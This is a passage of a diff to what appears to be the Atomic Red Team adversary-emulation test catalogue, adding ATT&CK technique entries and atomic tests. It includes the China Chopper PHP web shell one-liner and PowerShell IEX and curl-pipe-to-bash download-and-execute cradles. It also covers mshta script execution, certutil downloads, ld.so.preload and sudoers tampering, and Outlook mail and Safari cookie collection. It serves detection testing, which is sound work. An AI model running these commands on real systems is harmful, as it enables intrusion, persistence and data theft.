Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
<code><?php @eval($_POST['password']);></code>
Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running [cmd](https://attack.mitre.org/software/S0106) or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)
x_mitre_effective_permissions:
- SYSTEM
Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence.
x_mitre_permissions_required:
- User
- Administrator
x_mitre_effective_permissions:
- User
- Administrator
x_mitre_platforms:
- Linux
- Windows
- macOS
x_mitre_system_requirements:
- Adversary access to Web server with vulnerability or account to upload and
serve the Web shell file.
- Windows
type: attack-pattern
kill_chain_phases:
- phase_name: defense-evasion
kill_chain_name: mitre-attack
- phase_name: persistence
kill_chain_name: mitre-attack
- phase_name: privilege-escalation
kill_chain_name: mitre-attack
- phase_name: initial-access
kill_chain_name: mitre-attack
modified: '2018-10-17T00:14:20.652Z'
created: '2017-05-31T21:31:13.061Z'
created: '2017-05-31T21:31:00.645Z'
atomic_tests: []
T1103:
technique:
@@ -10626,6 +10771,26 @@ privilege-escalation:
command: 'echo #{path_to_shared_library} > /etc/ld.so.preload
'
- name: Process Injection via C#
description: |
Process Injection using C#
reference: https://github.com/pwndizzle/c-sharp-memory-injection
Excercises Five Techniques
1. Process injection
2. ApcInjectionAnyProcess
3. ApcInjectionNewProcess
4. IatInjection
5. ThreadHijack
supported_platforms:
- windows
input_arguments:
exe_binary:
description: Output Binary
type: Path
default: T1055.exe
executor:
name: command_prompt
command: ".\\bin\\#{exe_binary}\n"
T1053:
technique:
id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
@@ -11125,6 +11290,83 @@ privilege-escalation:
command: |
sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
sudo visudo -c -f /etc/sudoers
T1100:
technique:
id: attack-pattern--c16e5409-ee53-4d79-afdc-4099dc9292df
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Web Shell
description: |-
A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013)
Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary's primary access methods are detected and removed.
external_references:
- external_id: T1100
url: https://attack.mitre.org/techniques/T1100
source_name: mitre-attack
- url: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
description: Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down
the China Chopper Web Shell - Part I. Retrieved March 27, 2015.
source_name: Lee 2013
- url: https://www.us-cert.gov/ncas/alerts/TA15-314A
description: US-CERT. (2015, November 13). Compromised Web Servers and Web
Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.
source_name: US-CERT Alert TA15-314A Web Shells
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_version: '1.0'
x_mitre_data_sources:
- Anti-virus
- Authentication logs
- File monitoring
- Netflow/Enclave netflow
- Process monitoring
x_mitre_detection: |-
Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013)
<code><?php @eval($_POST['password']);></code>
Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running [cmd](https://attack.mitre.org/software/S0106) or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)
x_mitre_effective_permissions:
- SYSTEM
- User
x_mitre_platforms:
- Linux
- Windows
- macOS
x_mitre_system_requirements:
- Adversary access to Web server with vulnerability or account to upload and
serve the Web shell file.
type: attack-pattern
kill_chain_phases:
- phase_name: persistence
kill_chain_name: mitre-attack
- phase_name: privilege-escalation
kill_chain_name: mitre-attack
modified: '2018-10-17T00:14:20.652Z'
created: '2017-05-31T21:31:13.061Z'
identifier: T1100
atomic_tests:
- name: Web Shell Written to Disk
description: |
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk.
Idea from APTSimulator.
cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
supported_platforms:
- windows
input_arguments:
web_shell_path:
description: The path to drop the web shell
type: string
default: C:\inetpub\wwwroot
web_shells:
description: Path of Web Shell
type: path
default: C:\AtomicRedTeam\atomics\T1100\shells\
executor:
name: command_prompt
command: 'xcopy #{web_shells} #{web_shell_path}
'
discovery:
T1087:
technique:
@@ -12542,6 +12784,40 @@ discovery:
cat /etc/lsb-release >> /tmp/loot.txt
cat /etc/redhat-release >> /tmp/loot.txt
uptime >> /tmp/loot.txt
cat /etc/issue >> /tmp/loot.txt
- name: Linux VM Check via Hardware
description: 'Identify virtual machine hardware. This technique is used by the
Pupy RAT and other malware.
'
supported_platforms:
- linux
executor:
name: bash
command: |
cat /sys/class/dmi/id/bios_version | grep -i amazon
cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"
cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"
sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu"
cat /proc/scsi/scsi | grep -i "vmware\|vbox"
cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"
sudo lspci | grep -i "vmware\|virtualbox"
sudo lscpu | grep -i "Xen\|KVM\|Microsoft"
- name: Linux VM Check via Kernel Modules
description: 'Identify virtual machine guest kernel modules. This technique
is used by the Pupy RAT and other malware.
'
supported_platforms:
- linux
executor:
name: bash
command: |-
sudo lsmod | grep -i "vboxsf\|vboxguest"
sudo lsmod | grep -i "vmw_baloon\|vmxnet"
sudo lsmod | grep -i "xen-vbd\|xen-vnif"
sudo lsmod | grep -i "virtio_pci\|virtio_net"
sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
T1016:
technique:
id: attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0
@@ -15431,11 +15707,11 @@ execution:
bloodurl:
description: BloodHound URL
type: url
default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1
default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1
executor:
name: command_prompt
command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{bloodurl}'');
Get-BloodHoundData"
Invoke-BloodHound"
'
- name: Obfuscation Tests
@@ -15444,11 +15720,6 @@ execution:
Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
supported_platforms:
- windows
input_arguments:
bloodurl:
description: BloodHound URL
type: url
default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1
executor:
name: powershell
command: |
@@ -15517,7 +15788,7 @@ execution:
-Password #{password} -Description ''#{description}''
'
- name: Powershell MsXml COM object
- name: Powershell MsXml COM object - no prompt
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
@@ -15535,6 +15806,25 @@ execution:
-ComObject MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX
$comMsXml.ResponseText"
'
- name: Powershell MsXml COM object - with prompt
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
supported_platforms:
- windows
input_arguments:
url:
description: url of payload to execute
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
executor:
name: command_prompt
command: 'powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject
MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX
$comMsXml.ResponseText"
'
- name: Powershell XML requests
description: |
@@ -15567,7 +15857,7 @@ execution:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct
executor:
name: powershell
command: '"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject("script:#{url}").Exec();close()"
command: '"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject(''script:#{url}'').Exec();close()"
'
- name: Powershell Invoke-DownloadCradle
@@ -17081,11 +17371,11 @@ execution:
xmlfile:
description: Location of the test XML file on the local filesystem.
type: Path
default: C:\AtomicRedTeam\atomics\T1220\src\msxsl-xmlfile.xml
default: C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml
xslfile:
description: Location of the test XSL script file on the local filesystem.
type: Path
default: C:\AtomicRedTeam\atomics\T1220\src\msxsl-script.xsl
default: C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl
executor:
name: command_prompt
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
@@ -17103,11 +17393,11 @@ execution:
xmlfile:
description: Remote location (URL) of the test XML file.
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxsl-xmlfile.xml
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml
xslfile:
description: Remote location (URL) of the test XSL script file.
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxsl-script.xsl
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl
executor:
name: command_prompt
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
@@ -17128,7 +17418,7 @@ execution:
local_xsl_file:
description: Location of the test XSL script file on the local filesystem.
type: path
default: C:\AtomicRedTeam\atomics\T1220\src\wmic-script.xsl
default: C:\AtomicRedTeam\atomics\T1220\src\wmicscript.xsl
executor:
name: command_prompt
command: 'wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file}
@@ -17149,7 +17439,7 @@ execution:
remote_xsl_file:
description: Remote location of an XSL payload.
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmic-script.xsl
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl
executor:
name: command_prompt
command: 'wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}
@@ -17764,6 +18054,51 @@ lateral-movement:
command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
'
- name: certutil download (urlcache)
description: 'Use certutil -urlcache argument to download a file from the web.
Note - /urlcache also works!
'
supported_platforms:
- windows
input_arguments:
remote_file:
description: URL of file to copy
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path to place file
type: Path
default: Atomic-license.txt
executor:
name: command_prompt
command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
'
- name: certutil download (verifyctl)
description: 'Use certutil -verifyctl argument to download a file from the web.
Note - /verifyctl also works!
'
supported_platforms:
- windows
input_arguments:
remote_file:
description: URL of file to copy
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path to place file
type: Path
default: Atomic-license.txt
executor:
name: powershell
command: |
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f #{remote_file}
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }
T1077:
technique:
id: attack-pattern--ffe742ed-9100-4686-9e00-c331da544787
@@ -18309,19 +18644,18 @@ collection:
created: '2017-05-31T21:30:58.938Z'
identifier: T1074
atomic_tests:
- name: Stage data from Discovery.bat
description: 'Utilize powershell to download discovery.bat and save to a local
file
- name: Stage data from Discovery.sh
description: 'Utilize curl to download discovery.sh and execute a basic information
gathering shell script
'
supported_platforms:
- windows
- linux
- macos
executor:
name: powershell
command: '"IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat'')"
> c:\windows\pi.log
'
name: bash
command: curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.sh
| bash -s > /tmp/discovery.log
'':
technique:
id: attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf
@@ -18365,6 +18699,122 @@ collection:
modified: '2018-10-17T00:14:20.652Z'
created: '2017-05-31T21:31:37.917Z'
atomic_tests: []
T1005:
technique:
id: attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data from Local System
description: |-
Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.
Adversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
external_references:
- external_id: T1005
url: https://attack.mitre.org/techniques/T1005
source_name: mitre-attack
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_version: '1.0'
x_mitre_data_sources:
- File monitoring
- Process monitoring
- Process command-line parameters
x_mitre_detection: Monitor processes and command-line arguments for actions
that could be taken to collect files from a system. Remote access tools with
built-in features may interact directly with the Windows API to gather data.
Data may also be acquired through Windows system management tools such as
[Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
and [PowerShell](https://attack.mitre.org/techniques/T1086).
x_mitre_system_requirements:
- Privileges to access certain files and directories
x_mitre_platforms:
- Linux
- macOS
- Windows
type: attack-pattern
kill_chain_phases:
- phase_name: collection
kill_chain_name: mitre-attack
modified: '2018-10-17T00:14:20.652Z'
created: '2017-05-31T21:30:20.537Z'
identifier: T1005
atomic_tests:
- name: Search macOS Safari Cookies
description: 'This test uses `grep` to search a macOS Safari binaryCookies file
for specified values. This was used by CookieMiner malware.
'
supported_platforms:
- macos
input_arguments:
search_string:
description: String to search Safari cookies to find.
type: string
default: coinbase
executor:
name: sh
command: |
cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"
T1114:
technique:
id: attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Email Collection
description: |-
Adversaries may target user email to collect sensitive information from a target.
Files containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost.
Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network.
Some adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.
external_references:
- external_id: T1114
url: https://attack.mitre.org/techniques/T1114
source_name: mitre-attack
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_version: '1.0'
x_mitre_data_sources:
- Authentication logs
- File monitoring
- Process monitoring
- Process use of network
x_mitre_detection: |-
There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
File access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.
Monitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086).
x_mitre_platforms:
- Windows
type: attack-pattern
kill_chain_phases:
- phase_name: collection
kill_chain_name: mitre-attack
modified: '2018-10-17T00:14:20.652Z'
created: '2017-05-31T21:31:25.454Z'
identifier: T1114
atomic_tests:
- name: T1114 Email Collection with PowerShell
description: 'Search through local Outlook installation, extract mail, compress
the contents, and saves everything to a directory for later exfiltration.
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
Display email contents in the terminal
PS C:\> .\Get-Inbox.ps1
Write emails out to a CSV
PS C:\> .\Get-Inbox.ps1 -file "mail.csv"
Download and Execute
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Get-Inbox.ps1')"
T1056:
technique:
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
@@ -18795,7 +19245,7 @@ exfiltration:
created: '2017-05-31T21:30:30.260Z'
identifier: T1022
atomic_tests:
- name: Data Encrypted
- name: Data Encrypted with zip and gpg
description: 'Encrypt data for exiltration
'
@@ -18815,6 +19265,49 @@ exfiltration:
gpg -c /tmp/victim-gpg.txt
<enter passphrase and confirm>
ls -l
- name: Compress Data and lock with password for Exfiltration with winrar
description: |
Note: Requires winrar installation
rar a -p"blue" hello.rar (VARIANT)
supported_platforms:
- windows
executor:
name: command_prompt
command: |
mkdir ./tmp/victim-files
cd ./tmp/victim-files
echo "This file will be encrypted" > ./encrypted_file.txt
rar a -hp"blue" hello.rar
dir
- name: Compress Data and lock with password for Exfiltration with winzip
description: |
Note: Requires winzip installation
wzzip sample.zip -s"blueblue" *.txt (VARIANT)
supported_platforms:
- windows
executor:
name: command_prompt
command: |
path=%path%;"C:\Program Files (x86)\winzip"
mkdir ./tmp/victim-files
cd ./tmp/victim-files
echo "This file will be encrypted" > ./encrypted_file.txt
winzip32 -min -a -s"hello" archive.zip *
dir
- name: Compress Data and lock with password for Exfiltration with 7zip
description: 'Note: Requires 7zip installation
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
mkdir ./tmp/victim-files
cd ./tmp/victim-files
echo "This file will be encrypted" > ./encrypted_file.txt
7z a archive.7z -pblue
dir
T1030:
technique:
id: attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd
@@ -19446,6 +19939,133 @@ command-and-control:
command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
'
- name: certutil download (urlcache)
description: 'Use certutil -urlcache argument to download a file from the web.
Note - /urlcache also works!
'
supported_platforms:
- windows
input_arguments:
remote_file:
description: URL of file to copy
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path to place file
type: Path
default: Atomic-license.txt
executor:
name: command_prompt
command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
'
- name: certutil download (verifyctl)
description: 'Use certutil -verifyctl argument to download a file from the web.
Note - /verifyctl also works!
'
supported_platforms:
- windows
input_arguments:
remote_file:
description: URL of file to copy
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path to place file
type: Path
default: Atomic-license.txt
executor:
name: powershell
command: |
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f #{remote_file}
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }
T1071:
technique:
id: attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Standard Application Layer Protocol
description: |-
Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.
external_references:
- external_id: T1071
url: https://attack.mitre.org/techniques/T1071
source_name: mitre-attack
- url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_version: '1.0'
x_mitre_data_sources:
- Packet capture
- Netflow/Enclave netflow
- Process use of network
- Malware reverse engineering
- Process monitoring
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect application
layer protocols that do not follow the expected protocol for the port that
is being used. (Citation: University of Birmingham C2)'
x_mitre_network_requirements: true
x_mitre_platforms:
- Linux
- macOS
- Windows
type: attack-pattern
kill_chain_phases:
- phase_name: command-and-control
kill_chain_name: mitre-attack
modified: '2018-10-17T00:14:20.652Z'
created: '2017-05-31T21:30:56.776Z'
identifier: T1071
atomic_tests:
- name: Malicious User Agents
description: |
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
supported_platforms:
- windows
input_arguments:
domain:
description: Default domain to simulate against
type: string
default: www.google.com
executor:
name: powershell
command: |
Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
- name: Malicious User Agents - Nix
description: |
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
supported_platforms:
- linux
- macos
input_arguments:
domain:
description: Default domain to simulate against
type: string
default: www.google.com
executor:
name: sh
command: |
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
curl -s -A "*<|>*" -m3 #{domain}
T1065:
technique:
id: attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0
atomics/linux-index.md
+9 -5
View File
@@ -30,7 +30,7 @@
- [T1154 Trap](./T1154/T1154.md)
- Atomic Test #1: Trap [macos, centos, ubuntu, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1100 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1100 Web Shell](./T1100/T1100.md)
# discovery
- [T1087 Account Discovery](./T1087/T1087.md)
@@ -64,6 +64,8 @@
- [T1082 System Information Discovery](./T1082/T1082.md)
- Atomic Test #2: System Information Discovery [linux, macos]
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #4: Linux VM Check via Hardware [linux]
- Atomic Test #5: Linux VM Check via Kernel Modules [linux]
- [T1016 System Network Configuration Discovery](./T1016/T1016.md)
- Atomic Test #2: System Network Configuration Discovery [macos, linux]
- [T1049 System Network Connections Discovery](./T1049/T1049.md)
@@ -90,8 +92,9 @@
- [T1119 Automated Collection](./T1119/T1119.md)
- [T1115 Clipboard Data](./T1115/T1115.md)
- [T1074 Data Staged](./T1074/T1074.md)
- Atomic Test #1: Stage data from Discovery.sh [linux, macos]
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1005 Data from Local System](./T1005/T1005.md)
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056 Input Capture](./T1056/T1056.md)
@@ -106,7 +109,7 @@
- Atomic Test #4: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #5: Data Compressed - nix - tar Folder or File [linux, macos]
- [T1022 Data Encrypted](./T1022/T1022.md)
- Atomic Test #1: Data Encrypted [macos, centos, ubuntu, linux]
- Atomic Test #1: Data Encrypted with zip and gpg [macos, centos, ubuntu, linux]
- [T1030 Data Transfer Size Limits](./T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, centos, ubuntu, linux]
- [T1048 Exfiltration Over Alternative Protocol](./T1048/T1048.md)
@@ -248,7 +251,8 @@
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071 Standard Application Layer Protocol](./T1071/T1071.md)
- Atomic Test #2: Malicious User Agents - Nix [linux, macos]
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1065 Uncommonly Used Port](./T1065/T1065.md)
@@ -280,5 +284,5 @@
- Atomic Test #1: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #2: Disable tty_tickets for sudo caching [macos, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1100 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1100 Web Shell](./T1100/T1100.md)
atomics/linux-matrix.md
+4 -4
View File
@@ -6,18 +6,18 @@
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](./T1176/T1176.md) | [Setuid and Setgid](./T1166/T1166.md) | [Disabling Security Tools](./T1089/T1089.md) | [Credential Dumping](./T1003/T1003.md) | [File and Directory Discovery](./T1083/T1083.md) | [Remote File Copy](./T1105/T1105.md) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) |
| [Spearphishing Attachment](./T1193/T1193.md) | [Local Job Scheduling](./T1168/T1168.md) | [Create Account](./T1136/T1136.md) | [Sudo](./T1169/T1169.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials in Files](./T1081/T1081.md) | [Network Service Scanning](./T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scripting](./T1064/T1064.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Sudo Caching](./T1206/T1206.md) | [File Deletion](./T1107/T1107.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](./T1040/T1040.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Source](./T1153/T1153.md) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Permissions Modification](./T1222/T1222.md) | [Input Capture](./T1056/T1056.md) | [Password Policy Discovery](./T1201/T1201.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Space after Filename](./T1151/T1151.md) | [Local Job Scheduling](./T1168/T1168.md) | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](./T1148/T1148.md) | [Network Sniffing](./T1040/T1040.md) | [Permission Groups Discovery](./T1069/T1069.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
